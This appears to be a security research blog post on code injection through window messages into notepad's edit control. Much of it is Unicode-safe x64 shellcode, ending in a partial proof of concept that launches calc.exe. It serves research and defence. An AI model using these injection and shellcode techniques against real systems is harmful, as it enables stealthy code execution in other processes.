‘Shatter attacks’ use window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a follow-up paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of messages that could be used for both injection and redirection.
Setting the design of Windows itself aside, Shatter attacks were possible for two reasons: there was no isolation between processes sharing the same interactive desktop, and code was allowed to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels that prevent a low-privileged process from sending messages to a high-privileged process. Data Execution Prevention (DEP), which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.
ESET recently published a paper on the InvisiMole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC code was published in a previous blog entry here, and by Csaba Fitzl here.
For this post, I’ve written a PoC that does the following:
Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to Unicode.
Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.
To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:"s -u %1 %2 \"modexp\"". This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.
To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.
    hw  = FindWindow("Notepad", NULL);
    hw  = FindWindowEx(hw, NULL, "Edit", NULL);
    emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0);
    printf("EM Handle : %p\n", emh);
The handle points to the buffer allocated for input as you can see in Figure 3.
Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.
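The byte ranges listed above can be turned into a quick pre-flight check before anything is copied to the clipboard. The following is a minimal sketch in portable C that only encodes the ranges stated in this post, so it assumes CP_ACP is Windows-1252. The names `cp1252_is_bad` and `cp1252_first_bad` are made up for illustration, and the null byte is rejected because CF_TEXT data is a null-terminated string.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Returns 1 if the byte cannot be pasted as CF_TEXT and still come out of
// the Unicode conversion as "byte followed by a null byte".
// The ranges are the ones listed in the text (assumes CP-1252).
int cp1252_is_bad(uint8_t b) {
    if (b == 0x00) return 1;               // ends a CF_TEXT string early
    if (b >= 0x80 && b <= 0x8C) return 1;
    if (b >= 0x91 && b <= 0x9C) return 1;
    return b == 0x8E || b == 0x9E || b == 0x9F;
}

// Returns the offset of the first bad byte, or -1 if the buffer is clean.
long cp1252_first_bad(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (cp1252_is_bad(buf[i])) return (long)i;
    }
    return -1;
}
```

Running the check over the Ansi form of a payload points at the exact offset that needs rewriting, which is quicker than finding out from a crash in notepad.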
NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just be sure to avoid two consecutive null bytes, which indicate string termination, e.g. "\x00\x00".
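For the CF_UNICODETEXT route, a small check along these lines can flag a payload that would be cut short. It is a sketch rather than a tested tool, and `has_wide_terminator` is a hypothetical name. It assumes the payload is read as 16-bit units, in which case only a pair of null bytes starting at an even offset forms a terminator; a stricter check could reject any two consecutive null bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Returns 1 if the payload contains a 16-bit zero at an even offset,
// which a reader of a wide string treats as the end of the data.
int has_wide_terminator(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i + 1 < len; i += 2) {
        if (buf[i] == 0 && buf[i + 1] == 0) return 1;
    }
    return 0;
}
```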
If writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.
Throughout the code, you’ll see the following.
"\x00\x4d\x00" /* add byte [rbp], cl */
Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Addressing memory through BP always needs a displacement byte, which is why the instruction takes three bytes, and it can be used almost right away.
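To make the relationship between the two layouts concrete, here is a minimal sketch that collapses code written in its final, post-conversion form back into the single-byte string that would be placed on the clipboard. The function name `unicode_layout_to_ansi` is an assumption for illustration. It only verifies that every second byte is the null inserted by the conversion; it does not check the remaining bytes against the bad-character list.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Collapses code in its final (post-conversion) layout into the Ansi form.
// Returns the number of bytes written, or 0 if the length is odd or any
// odd offset holds a non-zero byte, meaning the code could not have been
// produced by widening single-byte characters.
size_t unicode_layout_to_ansi(const uint8_t *code, size_t len, uint8_t *out) {
    if (len % 2 != 0) return 0;
    for (size_t i = 0; i < len; i += 2) {
        if (code[i + 1] != 0) return 0;   // must be the inserted null byte
        out[i / 2] = code[i];
    }
    return len / 2;
}
```

Feeding it PUSH 0 / POP RAX followed by the padding instruction (6a 00 58 00 4d 00) yields the three bytes 6a 58 4d, while an instruction such as CMP EAX, EBX (39 d8) is rejected.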
Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that we’re not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.
    ; ************************* prolog
    mov   al, 0
    enter 256, 0
    ; save rbp
    push  rbp
    add   [rbp], al
    ; create local variable for rbp
    push  0
    push  rsp
    add   [rbp], al
    pop   rbp
    add   [rbp], cl
If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.
    EDITWORDBREAKPROCA EDITWORDBREAKPROCA;
    int EDITWORDBREAKPROCA(
      LPSTR lpch,
      int   ichCurrent,
      int   cch,
      int   code
    ) {...}
If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.
PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.
"\x6a\x00" /* push 0 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.
"\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x2d\x00\xff\x00\xff" /* sub eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.
"\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\xff\x00\xff" /* xor eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.
"\xb8\x00\xfe\x00\xfe" /* mov eax, 0xfe00fe00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x25\x00\x01\x00\x01" /* and eax, 0x01000100 */ "\x00\x4d\x00" /* add byte [rbp], cl */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc6\x00\x01" /* mov byte [rax], 1 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.
"\x6a\x00" /* push 0 */ "\x59" /* pop rcx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xe2\x00" /* loop $+2 */ "\x34\x00" /* xor al, 0 */ "\x51" /* push rcx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x6b\x00\xff" /* imul eax, dword [rax], -1 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x59" /* pop rcx */
Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some approaches.
Let’s take for example setting EAX to 0x12345678.
"\xb8\x78\x56\x34\x12" /* mov eax, 0x12345678 */
This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off. The leftover stack slot is popped into RCX rather than RAX, so that EAX keeps the result of the multiplication.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */ "\x59" /* pop rcx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\x56\x00\x12" /* xor eax, 0x12005600 */
Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc7\x00\x78\x00\x34\x00" /* mov dword [rax], 0x340078 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\x56\x00\x12" /* xor eax, 0x12005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */
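The MOV/XOR pattern generalizes to any 32-bit value: the even-numbered bytes go into the MOV immediate, the odd-numbered bytes go into the XOR immediate, and each immediate keeps a null in every other position. The sketch below generates the same byte sequence as the example above for a given value. `emit_load_eax` is a hypothetical helper, and it leaves it to the caller to confirm that each byte of the value is safe for CP-1252.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Writes code that loads v into EAX using MOV DWORD [RAX] / XOR EAX.
// Returns the number of bytes written (always 28).
size_t emit_load_eax(uint32_t v, uint8_t *out) {
    static const uint8_t pad[3] = {0x00, 0x4d, 0x00};  // add byte [rbp], cl
    uint8_t b0 = (uint8_t)v,         b1 = (uint8_t)(v >> 8);
    uint8_t b2 = (uint8_t)(v >> 16), b3 = (uint8_t)(v >> 24);
    uint8_t *p = out;

    *p++ = 0x6a; *p++ = 0x00;                  // push 0        (X)
    *p++ = 0x54;                               // push rsp      (A = &X)
    memcpy(p, pad, 3); p += 3;
    *p++ = 0x58;                               // pop rax       (rax = A)
    memcpy(p, pad, 3); p += 3;
    *p++ = 0xc7; *p++ = 0x00;                  // mov dword [rax], imm32
    *p++ = b0; *p++ = 0x00; *p++ = b2; *p++ = 0x00;
    *p++ = 0x58;                               // pop rax       (rax = X)
    memcpy(p, pad, 3); p += 3;
    *p++ = 0x35;                               // xor eax, imm32
    *p++ = 0x00; *p++ = b1; *p++ = 0x00; *p++ = b3;
    memcpy(p, pad, 3); p += 3;
    return (size_t)(p - out);
}
```

For 0x12345678 the MOV immediate becomes 0x00340078 and the XOR immediate becomes 0x12005600, matching the hand-written version.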
Another way using Rotate Left (ROL).
"\x68\x00\x78\x00\x34" /* push 0x34007800 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x18" /* rol dword [rax], 0x18 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\x56\x00\x12" /* xor eax, 0x12005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Another example using MOV and ROL.
"\x68\x00\x56\x00\x12" /* push 0x12005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc6\x00\x78" /* mov byte [rax], 0x78 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x10" /* rol dword [rax], 0x10 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc6\x00\x34" /* mov byte [rax], 0x34 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x10" /* rol dword [rax], 0x10 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
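The arithmetic behind the two ROL variants is easy to check outside of a debugger. This is a small model in plain C, not the shellcode itself; `rol32`, `via_rol_xor` and `via_mov_rol` are names chosen for this sketch.

```c
#include <assert.h>
#include <stdint.h>

// 32-bit rotate left, equivalent to ROL DWORD [mem], n.
uint32_t rol32(uint32_t v, unsigned n) {
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

// PUSH 0x34007800 / ROL 0x18 / XOR EAX, 0x12005600
uint32_t via_rol_xor(void) {
    uint32_t x = 0x34007800u;
    x = rol32(x, 0x18);              // 0x00340078
    return x ^ 0x12005600u;          // 0x12345678
}

// PUSH 0x12005600 / MOV BYTE 0x78 / ROL 0x10 / MOV BYTE 0x34 / ROL 0x10
uint32_t via_mov_rol(void) {
    uint32_t x = 0x12005600u;
    x = (x & 0xffffff00u) | 0x78;    // mov byte [rax], 0x78 -> 0x12005678
    x = rol32(x, 0x10);              // 0x56781200
    x = (x & 0xffffff00u) | 0x34;    // mov byte [rax], 0x34 -> 0x56781234
    return rol32(x, 0x10);           // 0x12345678
}
```

Modelling a sequence this way before encoding it helps catch a wrong rotate count or a swapped immediate early.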
The final example uses MOV, ADD and SCASB with the address of the buffer stored in RDI. Bytes are written from the least significant upwards, so 0x78 is stored first and 0x12 last.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb8\x00\x78\x00\xff" /* mov eax, 0xff007800 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xbb\x00\x56\x00\xff" /* mov ebx, 0xff005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb9\x00\x34\x00\xff" /* mov ecx, 0xff003400 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xba\x00\x12\x00\xff" /* mov edx, 0xff001200 */ "\x00\x27" /* add byte [rdi], ah */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xae" /* scasb */ "\x00\x3f" /* add byte [rdi], bh */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xae" /* scasb */ "\x00\x2f" /* add byte [rdi], ch */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xae" /* scasb */ "\x00\x37" /* add byte [rdi], dh */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
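Because x86 is little-endian, the order in which the four bytes are written decides the value that POP RAX reads back. A rough model of the ADD/SCASB steps, with `store_four` as a made-up name, shows the effect:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

// Mimics four "ADD BYTE [RDI], reg8" stores separated by SCASB on a zeroed
// stack slot, then reads the slot back the way POP RAX would.
uint32_t store_four(uint8_t first, uint8_t second, uint8_t third, uint8_t fourth) {
    uint8_t slot[8];
    uint8_t *rdi = slot;                 // push rsp / pop rdi
    memset(slot, 0, sizeof slot);        // push 0
    *rdi++ += first;                     // add [rdi], reg8 ; scasb
    *rdi++ += second;
    *rdi++ += third;
    *rdi   += fourth;                    // last store, RDI is not advanced
    return (uint32_t)slot[0]       | (uint32_t)slot[1] << 8 |
           (uint32_t)slot[2] << 16 | (uint32_t)slot[3] << 24;
}
```

Storing 0x78, 0x56, 0x34, 0x12 in that order reads back as 0x12345678, while the reverse order reads back as 0x78563412.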
If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.
    ; logic
    or     al, 0
    xor    al, 0
    and    al, 0
    ; arithmetic
    add    al, 0
    adc    al, 0
    sbb    al, 0
    sub    al, 0
    ; comparison predicates
    cmp    al, 0
    test   al, 0
    ; data transfer
    mov    al, 0
    mov    ah, 0
    mov    bl, 0
    mov    bh, 0
    mov    cl, 0
    mov    ch, 0
    mov    dl, 0
    mov    dh, 0
    ; branches
    jmp    $+2
    jo     $+2
    jno    $+2
    jb     $+2
    jae    $+2
    je     $+2
    jne    $+2
    jbe    $+2
    ja     $+2
    js     $+2
    jns    $+2
    jp     $+2
    jnp    $+2
    jl     $+2
    jge    $+2
    jle    $+2
    jg     $+2
    jrcxz  $+2
    loop   $+2
    loope  $+2
    loopne $+2
Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.
Prefix | Description |
---|---|
0x2E, 0x3E | Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions. |
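0xF0 | The LOCK prefix guarantees the instruction has exclusive use of all shared memory until the instruction completes execution. It is only valid on certain read-modify-write instructions with a memory destination; anywhere else it raises an invalid opcode exception. |
0xF2, 0xF3 | REPNE (0xF2) repeats execution of a string instruction like CMPS or SCAS until RCX is zero or the Zero Flag (ZF) is set. REP (0xF3) repeats a string instruction like MOVS or STOS until RCX is zero; with CMPS or SCAS it acts as REPE and also stops when ZF is cleared. |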
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 | The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux. |
0x66, 0x67 | The operand-size (0x66) and address-size (0x67) prefixes override the default operand or address size of an instruction such as PUSH/POP or MOV. NASM/YASM support them using o16, o32, a16 and a32. |
0x40 – 0x4F | REX prefixes for 64-Bit mode. |
Some things to consider when writing your own.
Some APIs will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write relative to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If it’s not aligned by 16 bytes at that point, expect trouble! 🙂
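A quick way to reason about the alignment requirement is to model what RET does to the stack pointer. The sketch below assumes the usual Microsoft x64 convention, where the stack is 16-byte aligned just before a CALL, so a function sees RSP % 16 == 8 on entry with its return address on top of the stack. `ret_transfer_is_aligned` is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

// rsp_before_ret points at the API address that RET is about to pop; the
// slot above it holds the address the API will eventually return to.
// Returns 1 if the API is entered with the stack it would see after a CALL.
int ret_transfer_is_aligned(uint64_t rsp_before_ret) {
    uint64_t rsp_at_entry = rsp_before_ret + 8;   // RET pops 8 bytes
    return (rsp_at_entry % 16) == 8;
}
```

In other words, RSP should be a multiple of 16 at the moment RET executes, which is why filler PUSH instructions are sometimes needed before the transfer.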
Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate that injection via notepad’s edit control works.
    // the max address for virtual memory on
    // windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
    #define MAX_ADDR 6

    // only useful for CP_ACP codepage
    static int is_cp1252_allowed(int ch) {
      // zero is allowed, but we can't use it for the clipboard
      if(ch == 0) return 0;
      // bytes converted to double byte characters
      if(ch >= 0x80 && ch <= 0x8C) return 0;
      if(ch >= 0x91 && ch <= 0x9C) return 0;
      return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
    }

    // Allocate 64-bit buffer on the stack.
    // Then place the address in RDI for writing.
    #define STORE_ADDR_SIZE 10
    char STORE_ADDR[] = {
      /* 0000 */ "\x6a\x00"             /* push 0                        */
      /* 0002 */ "\x54"                 /* push rsp                      */
      /* 0003 */ "\x00\x5d\x00"         /* add byte [rbp], bl            */
      /* 0006 */ "\x5f"                 /* pop rdi                       */
      /* 0007 */ "\x00\x5d\x00"         /* add byte [rbp], bl            */
    };

    // Load an 8-Bit immediate value into AH
    #define LOAD_BYTE_SIZE 5
    char LOAD_BYTE[] = {
      /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov eax, 0x4d00ff00           */
    };

    // Subtract 32 from AH
    #define SUB_BYTE_SIZE 8
    char SUB_BYTE[] = {
      /* 0000 */ "\x00\x5d\x00"         /* add byte [rbp], bl            */
      /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub eax, 0x5d002000           */
    };

    // Store AH in buffer and advance RDI by 1
    #define STORE_BYTE_SIZE 9
    char STORE_BYTE[] = {
      /* 0000 */ "\x00\x27"             /* add byte [rdi], ah            */
      /* 0002 */ "\x00\x5d\x00"         /* add byte [rbp], bl            */
      /* 0005 */ "\xae"                 /* scasb                         */
      /* 0006 */ "\x00\x5d\x00"         /* add byte [rbp], bl            */
    };

    // Transfers control of execution to kernel32!WinExec
    #define RET_SIZE 2
    char RET[] = {
      /* 0000 */ "\xc3"                 /* ret                           */
      /* 0001 */ "\x00"
    };

    #define CALC3_SIZE 164
    #define RET_OFS (0x20 + 2)
    char CALC3[] = {
      /* 0000 */ "\xb0\x00"                 /* mov al, 0                 */
      /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0            */
      /* 0006 */ "\x55"                     /* push rbp                  */
      /* 0007 */ "\x00\x45\x00"             /* add byte [rbp], al        */
      /* 000A */ "\x6a\x00"                 /* push 0                    */
      /* 000C */ "\x54"                     /* push rsp                  */
      /* 000D */ "\x00\x45\x00"             /* add byte [rbp], al        */
      /* 0010 */ "\x5d"                     /* pop rbp                   */
      /* 0011 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0014 */ "\x57"                     /* push rdi                  */
      /* 0015 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0018 */ "\x56"                     /* push rsi                  */
      /* 0019 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 001C */ "\x53"                     /* push rbx                  */
      /* 001D */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov eax, 0xff004d00       */
      /* 0025 */ "\x00\xe1"                 /* add cl, ah                */
      /* 0027 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov eax, 0xff000100       */
      /* 002F */ "\x00\xe5"                 /* add ch, ah                */
      /* 0031 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0034 */ "\x51"                     /* push rcx                  */
      /* 0035 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0038 */ "\x5b"                     /* pop rbx                   */
      /* 0039 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 003C */ "\x6a\x00"                 /* push 0                    */
      /* 003E */ "\x54"                     /* push rsp                  */
      /* 003F */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0042 */ "\x5f"                     /* pop rdi                   */
      /* 0043 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0046 */ "\x57"                     /* push rdi                  */
      /* 0047 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 004A */ "\x59"                     /* pop rcx                   */
      /* 004B */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 004E */ "\x6a\x00"                 /* push 0                    */
      /* 0050 */ "\x54"                     /* push rsp                  */
      /* 0051 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0054 */ "\x58"                     /* pop rax                   */
      /* 0055 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov dword [rax], 0x6c0063 */
      /* 005E */ "\x58"                     /* pop rax                   */
      /* 005F */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor eax, 0x63006100       */
      /* 0067 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 006A */ "\xab"                     /* stosd                     */
      /* 006B */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 006E */ "\x6a\x00"                 /* push 0                    */
      /* 0070 */ "\x54"                     /* push rsp                  */
      /* 0071 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0074 */ "\x58"                     /* pop rax                   */
      /* 0075 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0078 */ "\xc6\x00\x05"             /* mov byte [rax], 5         */
      /* 007B */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 007E */ "\x5a"                     /* pop rdx                   */
      /* 007F */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0082 */ "\x53"                     /* push rbx                  */
      /* 0083 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0086 */ "\x6a\x00"                 /* push 0                    */
      /* 0088 */ "\x6a\x00"                 /* push 0                    */
      /* 008A */ "\x6a\x00"                 /* push 0                    */
      /* 008C */ "\x6a\x00"                 /* push 0                    */
      /* 008E */ "\x6a\x00"                 /* push 0                    */
      /* 0090 */ "\x53"                     /* push rbx                  */
      /* 0091 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0094 */ "\x90"                     /* nop                       */
      /* 0095 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 0098 */ "\x90"                     /* nop                       */
      /* 0099 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 009C */ "\x90"                     /* nop                       */
      /* 009D */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
      /* 00A0 */ "\x90"                     /* nop                       */
      /* 00A1 */ "\x00\x4d\x00"             /* add byte [rbp], cl        */
    };

    #define CALC4_SIZE 79
    #define RET_OFS2 (0x18 + 2)
    char CALC4[] = {
      /* 0000 */ "\x59"                 /* pop rcx                       */
      /* 0001 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0004 */ "\x59"                 /* pop rcx                       */
      /* 0005 */ "\x00\x4d\x00"         /* add byte [rbp], cl            */
      /* 0008 */ "\x59"                 /* pop rcx                       */
